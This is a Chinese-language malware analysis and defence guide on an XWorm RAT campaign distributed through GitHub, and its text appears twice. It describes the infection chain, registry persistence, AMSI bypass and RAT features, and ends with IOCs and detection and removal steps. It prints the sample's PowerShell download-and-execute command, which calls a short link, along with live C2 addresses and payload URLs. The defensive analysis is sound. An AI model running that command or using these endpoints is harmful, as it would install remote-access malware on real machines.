未知攻击团伙利用github传播XWorm恶意软件
字数 2396 2025-08-24 23:51:09

XWorm恶意软件分析与防御指南

一、概述

近期发现一个通过GitHub传播XWorm恶意软件的威胁活动,攻击者利用GitHub项目托管恶意代码,通过一系列复杂的技术手段最终在受害者机器上部署XWorm RAT(远程访问木马)。本指南将详细分析攻击流程、技术细节,并提供防御建议。

二、攻击流程分析

1. 初始感染阶段

  • 传播途径:通过GitHub项目托管恶意文件
  • 初始样本:createassembly.txt
  • 创建时间:2024年5月12日创建并更新

2. 持久化机制

  • 注册表修改
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Driver Diag
值: REGSVR32 /s DriverDiagnosis
  • 文件释放:在%temp%目录释放隐藏COM组件文件DriverDiagnosis.dll

3. 载荷执行链

  1. 初始样本执行后加载DriverDiagnosis.dll
  2. DLL文件通过PowerShell获取后续载荷: 
    powershell.exe -windowstyle h -command iex(iwr t.ly/8evEY)
  3. 短链接解析到GitHub上的恶意脚本: 
    https://raw.githubusercontent.com/jonathansimms1234567/re4ts3e4ts3e4gwase4r5tsergsergs/main/gaber.txt

三、技术细节分析

1. AMSI绕过技术

样本采用多种技术绕过Windows反恶意软件扫描接口(AMSI):

  • 使用内存修补技术修改AMSI相关函数
  • 采用编码/混淆方式隐藏恶意代码
  • 通过PowerShell反射加载恶意代码

2. 内存加载技术

攻击者使用多种内存加载技术:

  1. 直接内存加载PE文件

    • 从文本文件中解码出PE文件并直接映射到内存执行
    • 文件大小:61,952字节(gaber.txt_decryptedBytes_RAT)

  2. Shellcode加载

    • 先加载小型shellcode
    • 由shellcode在内存中加载最终XWorm RAT
    • 文件大小:36,864字节(efawef_shellcode_RAT)

3. XWorm RAT功能分析

配置信息

样本中发现的配置信息格式:

<C2地址><端口><密码><ID><版本信息>

示例:

localbeheaders.mcgo.io:4411<123456789><Xwormmm>IVANofficialUSB.exe
198.23.187.140:4646<123456789><Xwormmm>XWorm V5.0USB.exe

主要功能

  1. 基础功能

    • 进程管理(启动/终止)
    • 文件系统操作
    • 屏幕截图捕获
    • 键盘记录

  2. 网络功能

    • 从URL下载文件
    • 通过浏览器打开指定网页
    • DDoS攻击能力(StartDDos/StopDDos指令)

  3. 系统控制

    • 关机/重启/注销
    • 程序更新/卸载
    • PowerShell命令执行

  4. 插件架构

    • 支持动态加载插件DLL扩展功能
    • 插件可能包括:高级键盘记录、密码窃取等

4. 混淆与反分析技术

  • 使用代码混淆工具处理.NET程序集
  • 关键字符串加密存储
  • 使用de4dot工具可进行去混淆处理

四、IOC(入侵指标)

文件哈希

文件名 MD5哈希
createassembly.txt 2AE2FC8AA260167415BFEBC1078C5092
DriverDiagnosis.dll 4C9368DBF637B37674AF658B5F73232D
gaber.txt 05110972AD5B31B3B5AB8D3E82E0B283
gaber.txt_decryptedBytes_RAT 7B87DC448C231FDA9F181AE2BBFA5D13
customer_p4yl0ad.txt 97896726D7BB3027938500F395C529B6
customer_p4yl0ad.txt_decryptedbytes_RAT ADA55D22F9AED7DDEE6E9AC5B78F164D
efawef.txt 97B92BADF904B5D3CB95EA7F72591BA1
efawef_shellcode_RAT F14391D4B59BF55E05357D5A585C5138

网络指标

  • 短链接:t.ly/8evEY
  • GitHub仓库: 
    https://raw.githubusercontent.com/jonathansimms1234567/re4ts3e4ts3e4gwase4r5tsergsergs/main/gaber.txt
  • Pastebin链接: 
    https://pastebin.com/raw/zNCj2Utm
  • C2服务器: 
    localbeheaders.mcgo.io:4411
198.23.187.140:4646

PDB路径

C:\Users\Administrator.ADMINISTRATOR\Desktop\CMDLL-master\x64\Release\Cmd.pdb

五、检测与防御措施

1. 检测方法

  1. 注册表监控

    • 监控HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run下的异常项
    • 特别关注包含"REGSVR32 /s"命令的启动项

  2. 文件系统监控

    • 监控%TEMP%目录下创建的隐藏COM组件文件
    • 查找名为DriverDiagnosis.dll的可疑文件

  3. 进程监控

    • 检测异常PowerShell进程执行: 
      powershell.exe -windowstyle h -command iex(iwr *)

  4. 网络流量监控

    • 检测与已知C2服务器(localbeheaders.mcgo.io, 198.23.187.140)的连接
    • 监控对pastebin.com和GitHub特定仓库的访问

2. 防御措施

  1. 应用程序控制

    • 限制PowerShell执行策略
    • 禁止从临时目录执行DLL文件

  2. AMSI增强

    • 启用并配置AMSI高级保护
    • 监控AMSI绕过尝试

  3. 用户教育

    • 警惕不明来源的GitHub项目
    • 不随意点击短链接

  4. 系统加固

    • 禁用不必要的COM组件
    • 限制注册表修改权限

六、分析与清除工具

1. 分析工具

  • de4dot:用于.NET程序反混淆
  • PEiD:检测加壳/混淆的PE文件
  • Process Monitor:监控文件、注册表和进程活动

2. 清除步骤

  1. 终止相关进程:

    • 查找并终止异常的PowerShell进程
    • 终止可疑的svchost或rundll32进程

  2. 删除持久化项:

    • 删除注册表中的恶意启动项: 
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Driver Diag

  3. 删除恶意文件:

    • 清理%TEMP%目录下的DriverDiagnosis.dll
    • 删除其他已识别的恶意文件

  4. 网络隔离:

    • 阻断与C2服务器的通信
    • 检查系统代理设置

七、总结

此次攻击活动展示了攻击者如何利用合法平台(GitHub)托管恶意代码,通过多阶段加载技术绕过安全防护,最终部署功能强大的XWorm RAT。防御此类攻击需要多层防护策略,包括严格的应用程序控制、增强的AMSI保护和持续的网络监控。

XWorm恶意软件分析与防御指南 一、概述 近期发现一个通过GitHub传播XWorm恶意软件的威胁活动,攻击者利用GitHub项目托管恶意代码,通过一系列复杂的技术手段最终在受害者机器上部署XWorm RAT(远程访问木马)。本指南将详细分析攻击流程、技术细节,并提供防御建议。 二、攻击流程分析 1. 初始感染阶段 传播途径 :通过GitHub项目托管恶意文件 初始样本 :createassembly.txt 创建时间 :2024年5月12日创建并更新 2. 持久化机制 注册表修改 : 文件释放 :在%temp%目录释放隐藏COM组件文件DriverDiagnosis.dll 3. 载荷执行链 初始样本执行后加载DriverDiagnosis.dll DLL文件通过PowerShell获取后续载荷: 短链接解析到GitHub上的恶意脚本: 三、技术细节分析 1. AMSI绕过技术 样本采用多种技术绕过Windows反恶意软件扫描接口(AMSI): 使用内存修补技术修改AMSI相关函数 采用编码/混淆方式隐藏恶意代码 通过PowerShell反射加载恶意代码 2. 内存加载技术 攻击者使用多种内存加载技术: 直接内存加载PE文件 : 从文本文件中解码出PE文件并直接映射到内存执行 文件大小:61,952字节(gaber.txt_ decryptedBytes_ RAT) Shellcode加载 : 先加载小型shellcode 由shellcode在内存中加载最终XWorm RAT 文件大小:36,864字节(efawef_ shellcode_ RAT) 3. XWorm RAT功能分析 配置信息 样本中发现的配置信息格式: 示例: 主要功能 基础功能 : 进程管理(启动/终止) 文件系统操作 屏幕截图捕获 键盘记录 网络功能 : 从URL下载文件 通过浏览器打开指定网页 DDoS攻击能力(StartDDos/StopDDos指令) 系统控制 : 关机/重启/注销 程序更新/卸载 PowerShell命令执行 插件架构 : 支持动态加载插件DLL扩展功能 插件可能包括:高级键盘记录、密码窃取等 4. 混淆与反分析技术 使用代码混淆工具处理.NET程序集 关键字符串加密存储 使用de4dot工具可进行去混淆处理 四、IOC(入侵指标) 文件哈希 | 文件名 | MD5哈希 | |--------|---------| | createassembly.txt | 2AE2FC8AA260167415BFEBC1078C5092 | | DriverDiagnosis.dll | 4C9368DBF637B37674AF658B5F73232D | | gaber.txt | 05110972AD5B31B3B5AB8D3E82E0B283 | | gaber.txt_ decryptedBytes_ RAT | 7B87DC448C231FDA9F181AE2BBFA5D13 | | customer_ p4yl0ad.txt | 97896726D7BB3027938500F395C529B6 | | customer_ p4yl0ad.txt_ decryptedbytes_ RAT | ADA55D22F9AED7DDEE6E9AC5B78F164D | | efawef.txt | 97B92BADF904B5D3CB95EA7F72591BA1 | | efawef_ shellcode_ RAT | F14391D4B59BF55E05357D5A585C5138 | 网络指标 短链接:t.ly/8evEY GitHub仓库: Pastebin链接: C2服务器: PDB路径 五、检测与防御措施 1. 检测方法 注册表监控 : 监控HKEY_ CURRENT_ USER\Software\Microsoft\Windows\CurrentVersion\Run下的异常项 特别关注包含"REGSVR32 /s"命令的启动项 文件系统监控 : 监控%TEMP%目录下创建的隐藏COM组件文件 查找名为DriverDiagnosis.dll的可疑文件 进程监控 : 检测异常PowerShell进程执行: 网络流量监控 : 检测与已知C2服务器(localbeheaders.mcgo.io, 198.23.187.140)的连接 监控对pastebin.com和GitHub特定仓库的访问 2. 防御措施 应用程序控制 : 限制PowerShell执行策略 禁止从临时目录执行DLL文件 AMSI增强 : 启用并配置AMSI高级保护 监控AMSI绕过尝试 用户教育 : 警惕不明来源的GitHub项目 不随意点击短链接 系统加固 : 禁用不必要的COM组件 限制注册表修改权限 六、分析与清除工具 1. 分析工具 de4dot :用于.NET程序反混淆 PEiD :检测加壳/混淆的PE文件 Process Monitor :监控文件、注册表和进程活动 2. 清除步骤 终止相关进程: 查找并终止异常的PowerShell进程 终止可疑的svchost或rundll32进程 删除持久化项: 删除注册表中的恶意启动项: 删除恶意文件: 清理%TEMP%目录下的DriverDiagnosis.dll 删除其他已识别的恶意文件 网络隔离: 阻断与C2服务器的通信 检查系统代理设置 七、总结 此次攻击活动展示了攻击者如何利用合法平台(GitHub)托管恶意代码,通过多阶段加载技术绕过安全防护,最终部署功能强大的XWorm RAT。防御此类攻击需要多层防护策略,包括严格的应用程序控制、增强的AMSI保护和持续的网络监控。